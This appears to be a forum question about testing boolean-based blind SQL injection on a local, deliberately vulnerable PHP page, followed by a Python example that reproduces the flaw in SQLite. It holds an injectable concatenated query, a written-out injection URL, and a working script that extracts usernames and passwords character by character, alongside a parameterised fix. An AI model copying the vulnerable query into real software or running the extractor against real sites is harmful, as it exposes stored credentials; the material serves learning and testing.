I don't have a production server to test on and I don't want to install apache, php and mysql on my main dev box so I came here for some suggestions/answers.
I have a mysql database containing mock user data (usernames and passwords)
Code
mysql> select * from test;
+----+----------+----------+
| id | username | password |
+----+----------+----------+
|  1 | user1    | pass1    |
|  2 | user2    | pass2    |
|  3 | user3    | pass3    |
+----+----------+----------+
3 rows in set (0.00 sec)
and I have a SQLI vulnerable php script:
Code
<?php
// Create connection (deprecated mysql_* extension, as in the original)
$con = mysql_connect("127.0.0.1", "root", "");
mysql_select_db('test', $con);

// User input taken straight from the query string, no validation
$id = $_GET["id"];

// Input concatenated directly into the query: this is the SQL injection point
$result = mysql_query("SELECT * FROM test WHERE id=" . $id);

// If the injected query fails, mysql_query() returns false and
// mysql_fetch_array() is handed a boolean instead of a result resource
while ($row = mysql_fetch_array($result)) {
    echo "<p>" . $row['username'] . " " . $row['password'] . "</p>";
    echo "<br>";
}
mysql_close($con);
?>
and I am running this in a WAMP server environment.
I am trying to test out a SQL injection technique, but when I test it the source code displays errors, although the data is still printed in the browser. What is weirder is that the data printed in the browser (username and password) is not in the HTML at all in Firefox.
And here is the HTML that shows up even though the user data is still printed to the screen:
Code
<br />
<font size='1'><table class='xdebug-error xe-deprecated' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Deprecated: mysql_connect(): The mysql extension is deprecated and will be removed in the future: use mysqli or PDO instead in C:\wamp\www\test.php on line <i>3</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0010</td><td bgcolor='#eeeeec' align='right'>134776</td><td bgcolor='#eeeeec'>{main}( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>0</td></tr>
<tr><td bgcolor='#eeeeec' align='center'>2</td><td bgcolor='#eeeeec' align='center'>0.0010</td><td bgcolor='#eeeeec' align='right'>134960</td><td bgcolor='#eeeeec'><a href='http://www.php.net/function.mysql-connect' target='_new'>mysql_connect</a>
( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>3</td></tr>
</table></font>
<br />
<font size='1'><table class='xdebug-error xe-warning' dir='ltr' border='1' cellspacing='0' cellpadding='1'>
<tr><th align='left' bgcolor='#f57900' colspan="5"><span style='background-color: #cc0000; color: #fce94f; font-size: x-large;'>( ! )</span> Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in C:\wamp\www\test.php on line <i>12</i></th></tr>
<tr><th align='left' bgcolor='#e9b96e' colspan='5'>Call Stack</th></tr>
<tr><th align='center' bgcolor='#eeeeec'>#</th><th align='left' bgcolor='#eeeeec'>Time</th><th align='left' bgcolor='#eeeeec'>Memory</th><th align='left' bgcolor='#eeeeec'>Function</th><th align='left' bgcolor='#eeeeec'>Location</th></tr>
<tr><td bgcolor='#eeeeec' align='center'>1</td><td bgcolor='#eeeeec' align='center'>0.0010</td><td bgcolor='#eeeeec' align='right'>134776</td><td bgcolor='#eeeeec'>{main}( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>0</td></tr>
<tr><td bgcolor='#eeeeec' align='center'>2</td><td bgcolor='#eeeeec' align='center'>0.0100</td><td bgcolor='#eeeeec' align='right'>142048</td><td bgcolor='#eeeeec'><a href='http://www.php.net/function.mysql-fetch-array' target='_new'>mysql_fetch_array</a>
( )</td><td title='C:\wamp\www\test.php' bgcolor='#eeeeec'>..\test.php<b>:</b>12</td></tr>
</table></font>
The <br /> shows up; why is the data truncated even though it is still displaying in the browser?
The SQLi that I am attempting to use is called boolean enumeration, where you test each position of a returned SQL value for equality, inferiority, or superiority, adjusting your test parameters until you have a match.
Code
http://127.0.0.1/test.php?id=1 AND (SUBSTRING((SELECT username FROM test LIMIT 1,1), 1,1) > CHAR(63))--+
I assume it is partly because of the boolean expression PHP is not expecting, but meh. Anyone have some input? Weirdly enough, the data shows up in Internet Explorer. This is causing the application I am making to throw up.
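The boolean enumeration the post describes, written out as an added example that is not the poster's code. It stands in an in-memory SQLite database for the WAMP MySQL setup (same three rows, constructed inline), so `SUBSTRING`/`CHAR` become SQLite's `substr`/`char` and `LIMIT 1,1` keeps the same offset,count meaning. `vulnerable_lookup` concatenates the parameter exactly the way the PHP does; `oracle` sends a `1 AND (...)-- ` payload (the `+` in the post's `--+` is what the query string decodes to a space) and reports whether the id=1 row came back; `extract` binary-searches each character against `> char(n)` instead of stepping one value at a time. `safe_lookup` is the hardened form (cast plus bound parameter) so the same payload can be shown failing. All function names are this example's own.

```python
import sqlite3

# Constructed stand-in for the poster's MySQL "test" table (same three rows).
ROWS = [(1, "user1", "pass1"), (2, "user2", "pass2"), (3, "user3", "pass3")]


def make_db():
    """Build the in-memory database that plays the part of the WAMP MySQL server."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE test (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO test VALUES (?, ?, ?)", ROWS)
    return con


def vulnerable_lookup(con, id_param):
    """Mirrors the PHP: the raw parameter is concatenated into the SQL text."""
    return con.execute("SELECT * FROM test WHERE id=" + id_param).fetchall()


def safe_lookup(con, id_param):
    """Hardened form: reject non-integers, then bind the value as a parameter."""
    return con.execute("SELECT * FROM test WHERE id=?", (int(id_param),)).fetchall()


def safe_lookup_rejects(con, id_param):
    """True when the hardened lookup refuses the parameter instead of running it."""
    try:
        safe_lookup(con, id_param)
    except ValueError:
        return True
    return False


def oracle(con, condition):
    """Boolean oracle: does the id=1 row still come back with `condition` ANDed on?

    The trailing '-- ' comments out anything after the injected expression,
    which is what the post's '--+' turns into once the '+' decodes to a space.
    """
    payload = "1 AND ({})-- ".format(condition)
    return len(vulnerable_lookup(con, payload)) > 0


def extract(con, column, row_index, max_len=32):
    """Boolean enumeration of one cell, one character position at a time.

    For each position we binary-search the byte value with `substr(...) > char(mid)`,
    which needs about 7 oracle queries per character instead of up to 127.
    substr() past the end of the string returns '', which is never greater than
    any char(), so the search converging on 0 marks the end of the value.
    """
    target = "(SELECT {} FROM test LIMIT {},1)".format(column, row_index)
    out = ""
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127
        while lo < hi:
            mid = (lo + hi) // 2
            cond = "substr({}, {}, 1) > char({})".format(target, pos, mid)
            if oracle(con, cond):
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:
            break
        out += chr(lo)
    return out


if __name__ == "__main__":
    db = make_db()
    # The post's payload (second row's username, first character, compared to CHAR(63))
    probe = "1 AND (substr((SELECT username FROM test LIMIT 1,1), 1, 1) > char(63))-- "
    print("probe returns:", vulnerable_lookup(db, probe))
    print("username of row 2:", extract(db, "username", 1))
    print("password of row 3:", extract(db, "password", 2))
    print("hardened lookup rejects the probe:", safe_lookup_rejects(db, probe))
```

Run it directly to watch a whole column value come out of the boolean oracle; in practice each `oracle` call is one HTTP request to `test.php?id=...`, and a comparison that the database rejects (a syntax error, or a function it does not have) is exactly what makes `mysql_query()` return `false` and produces the "expects parameter 1 to be resource, boolean given" warning seen above.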